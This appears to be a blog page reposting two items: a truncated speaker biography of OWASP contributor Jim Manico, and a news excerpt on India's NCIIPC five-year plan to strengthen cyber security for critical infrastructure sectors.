Jim Manico, VP Security Architecture, WhiteHat Security
Jim Manico is the VP of Security Architecture for WhiteHat Security. He is the founder, producer and host of the OWASP Podcast Series, as well as the committee chair for the OWASP Connections Committee. He is the project manager of the OWASP Cheatsheet series, and a significant contributor to several other OWASP projects. Jim provides secure coding and developer awareness training for WhiteHat Security using his 8+ years of experience delivering developer-training courses for SANS, Aspect Secur…

Source link: http://vimeo.com/54130346


Govt draws up plan to revamp cyber security of critical sectors


NEW DELHI: In its bid to meet the challenge of ever increasing cyber attacks and security in the virtual world, the government has set in motion a five-year project to revamp the entire cyber security apparatus of critical sectors in the country. In the past one year, India has suffered 13,000 cyber incidents.

The responsibility for the job has been vested in National Critical Information Infrastructure Protection Centre (NCIIPC), the nodal agency to coordinate cyber security operations for critical infrastructures across the country. NCIIPC has prepared a five-year plan to completely revamp and integrate the cyber security apparatus of all critical infrastructure such as power, transportation, water, telecommunication and defence.

The agency, which is soon to be notified, further plans to set up sectoral Computer Emergency Response Teams (CERTs) that will be connected to it. It will install sensors on all critical systems to give real-time information to its command and control centre about any cyber attack to formulate quick response.


read more..........http://timesofindia.indiatimes.com/india/Govt-draws-up-plan-to-revamp-cyber-security-of-critical-sectors/articleshow/17749665.cms?utm_source=twitterfeed&utm_medium=twitter